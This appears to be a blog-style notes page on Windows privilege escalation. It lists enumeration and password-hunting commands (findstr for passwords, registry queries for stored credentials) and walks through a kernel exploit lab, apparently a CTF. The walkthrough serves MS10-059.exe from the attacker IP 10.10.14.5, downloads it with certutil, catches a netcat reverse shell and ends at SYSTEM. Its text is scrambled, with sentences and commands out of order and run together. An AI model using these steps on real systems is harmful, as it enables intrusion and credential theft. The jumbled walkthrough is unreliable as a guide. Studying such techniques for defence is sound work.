Notes - Windows Privilege Escalation
Privilege escalation refers to the act of a user or program gaining access to resources or privileges that are not normally available to them. In the context of a Windows operating system, privilege escalation refers to a user or program gaining access to system-level privileges, such as the ability to install software or access system files.
It is important to note that there is a User Enumeration command among the System Enumeration commands, because getting to know the output of whoami is almost always more important than getting to know the output of wmic logicaldisk.
In this entry we will see how to escalate privileges via kernel expoits.
I would like to highlight that there are several other escalation paths. The escalation paths are:
to sysinfo.txt.
Let's see what the Windows Exploit Suggester tells us.
It tells us several things, one of this is the MS10-059 exploit, also known as Chimichurri.
Let's download the exploit from it's GitHub page and set up a simple HTTP server where the downloaded exploit is located.
The browser may stop the download, warning us that it is in fact an exploit but we can tell the browser to download it anyway.
Let's download the exploit on the target machine from our own machine. My kali's IP address is 10.10.14.5.
To download the exploit, move to Temp folder then give the target machine the following command:
Let's set up a netcat listener on the kali machine
Let's use the exploit on the target machine
After a moment, looking at the netcat listener we can see that we got a shell. Giving the target machine the command
Easy.
It is important for system administrators and users to be aware of the potential for privilege escalation and to take steps to secure their systems against it. This may include keeping the operating system and installed software up to date with the latest security patches, implementing strong password policies, and using security software to detect and prevent attempts at privilege escalation.
Initial Enumeration Commands for Windows PE
System Enumeration
> systeminfo
> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
> whoami
> hostname
> wmic qfe
> wmic qfe get Caption,Description,HotFixID,InstalledOn
> wmic logicaldisk
> wmic logicaldisk get caption,description,providername
User Enumeration
> whoami /priv
> whoami /groups
> net user
> net user *USER*
> net user administrator
> net localgroup
> net localgroup administrators
Network Enumeration
> ipconfig
> ipconfig /all
> arp -a
> route print
> netstat -ano
Password Hunting
> findstr /si password *.config *.ini *.txt *.xml
> reg query "HKCU\Software\ORL\WinVNC3\Password"
> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
> reg query "HKLM\SYSTEM\Current\Controlset\Services\SNMP"
AV and Firewall Enumeration
> sc query windefend
> sc queryex type= service
> netsh advfirewall firewall dump
> netsh firewall show state
> netsh firewall show config
- Kernel Exploits
- Passwords and Port Forwarding
- WSL
- Impersonation and Potato Attacks
- getsystem
- RunAs
- Registry
- Exe Files
- Startup Apps
- DLL Hijacking
- Service Permissions (Paths)
- CVE unrelated to the above paths
Kernel Exploits
What is a Kernel? The Kernel is a computer program that controls everything in the system. The Kernel helps interactions between hardware and software components. The Kernel is a translator. Let's say that I have a Windows 7 32 bit machine that I have just gained access to as a low privileged user. First things first, I copied the output of> systeminfo# ./windows-exploit-suggester.py --database 2020-04-17-mssb.xls --systeminfo sysinfo.txt# python3 -m http.server 80Serving HTTP on 0.0.0.0 port 80 ...> certutil -urlcache -f http://10.10.14.5/MS10-059.exe ms.exe# nc -lvnp 5555Listening on [any] 5555 ...> ms.exe 10.10.14.5 5555whoami we can see that we are now the system user.
> whoamiwhoamint authority/system>